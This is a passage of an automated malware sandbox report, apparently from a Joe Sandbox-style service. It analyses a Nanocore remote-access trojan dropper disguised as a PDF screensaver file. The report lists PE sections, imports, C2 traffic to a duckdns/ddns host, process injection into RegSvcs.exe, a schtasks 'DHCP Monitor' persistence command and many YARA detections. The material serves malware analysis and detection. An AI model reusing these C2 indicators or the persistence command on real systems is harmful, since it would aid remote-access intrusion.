          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x640000x4a8c0x4c00False0.6105571546052632data6.391160230365552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x690000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
          PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
          RT_ICON0x666180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192
          RT_DIALOG0x667400x286dataEnglishUnited States
          RT_DIALOG0x669c80x13adataEnglishUnited States
          RT_DIALOG0x66b040xecdataEnglishUnited States
          RT_DIALOG0x66bf00x12edataEnglishUnited States
          RT_DIALOG0x66d200x338dataEnglishUnited States
          RT_DIALOG0x670580x252dataEnglishUnited States
          RT_STRING0x672ac0x1e2dataEnglishUnited States
          RT_STRING0x674900x1ccdataEnglishUnited States
          RT_STRING0x6765c0x1b8dataEnglishUnited States
          RT_STRING0x678140x146dataEnglishUnited States
          RT_STRING0x6795c0x46cdataEnglishUnited States
          RT_STRING0x67dc80x166dataEnglishUnited States
          RT_STRING0x67f300x152dataEnglishUnited States
          RT_STRING0x680840x10adataEnglishUnited States
          RT_STRING0x681900xbcdataEnglishUnited States
          RT_STRING0x6824c0xd6dataEnglishUnited States
          RT_GROUP_ICON0x683240x14data
          RT_MANIFEST0x683380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Feb 2, 2023 08:09:58.131228924 CET4970060705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:01.243844986 CET4970060705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:07.244303942 CET4970060705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:24.303241014 CET4970560705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:27.408564091 CET4970560705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:33.418741941 CET4970560705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:49.414972067 CET4970760705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:52.435837984 CET4970760705192.168.2.5212.193.30.230
          Feb 2, 2023 08:10:58.508714914 CET4970760705192.168.2.5212.193.30.230
          Feb 2, 2023 08:11:07.956806898 CET4970960705192.168.2.5212.193.30.230
          Feb 2, 2023 08:11:11.050592899 CET4970960705192.168.2.5212.193.30.230
          Feb 2, 2023 08:11:17.053057909 CET4970960705192.168.2.5212.193.30.230

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Feb 2, 2023 08:09:57.770723104 CET6084153192.168.2.58.8.8.8
          Feb 2, 2023 08:09:57.877348900 CET53608418.8.8.8192.168.2.5
          Feb 2, 2023 08:10:24.189878941 CET4972453192.168.2.58.8.8.8
          Feb 2, 2023 08:10:24.299720049 CET53497248.8.8.8192.168.2.5
          Feb 2, 2023 08:10:49.296843052 CET6532353192.168.2.58.8.8.8
          Feb 2, 2023 08:10:49.405663013 CET53653238.8.8.8192.168.2.5
          Feb 2, 2023 08:11:07.934437990 CET6344653192.168.2.58.8.8.8
          Feb 2, 2023 08:11:07.953950882 CET53634468.8.8.8192.168.2.5

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Feb 2, 2023 08:09:57.770723104 CET192.168.2.58.8.8.80x830aStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
          Feb 2, 2023 08:10:24.189878941 CET192.168.2.58.8.8.80x17beStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
          Feb 2, 2023 08:10:49.296843052 CET192.168.2.58.8.8.80x8dd7Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
          Feb 2, 2023 08:11:07.934437990 CET192.168.2.58.8.8.80x1c9aStandard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Feb 2, 2023 08:09:57.877348900 CET8.8.8.8192.168.2.50x830aNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
          Feb 2, 2023 08:10:24.299720049 CET8.8.8.8192.168.2.50x17beNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
          Feb 2, 2023 08:10:49.405663013 CET8.8.8.8192.168.2.50x8dd7No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
          Feb 2, 2023 08:11:07.953950882 CET8.8.8.8192.168.2.50x1c9aNo error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:08:09:32
          Start date:02/02/2023
          Path:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          Imagebase:0xcc0000
          File size:1064658 bytes
          MD5 hash:C2A80CCF6362BBA805072DE9CE963EA5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          General

          Target ID:1
          Start time:08:09:46
          Start date:02/02/2023
          Path:C:\Windows\SysWOW64\wscript.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
          Imagebase:0x50000
          File size:147456 bytes
          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          Reputation:high

          General

          Target ID:2
          Start time:08:09:54
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 46%, ReversingLabs
          Reputation:low

          General

          Target ID:3
          Start time:08:10:05
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0xe80000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
          Antivirus matches:
          • Detection: 0%, ReversingLabs
          Reputation:high

          General

          Target ID:4
          Start time:08:10:12
          Start date:02/02/2023
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
          Imagebase:0x2c0000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:5
          Start time:08:10:12
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          General

          Target ID:6
          Start time:08:10:13
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:7
          Start time:08:10:13
          Start date:02/02/2023
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
          Imagebase:0x2c0000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:8
          Start time:08:10:13
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Target ID:9
          Start time:08:10:14
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
          Imagebase:0xc60000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET

          General

          Target ID:10
          Start time:08:10:15
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Target ID:11
          Start time:08:10:15
          Start date:02/02/2023
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
          Imagebase:0x400000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Antivirus matches:
          • Detection: 0%, ReversingLabs

          General

          Target ID:12
          Start time:08:10:15
          Start date:02/02/2023
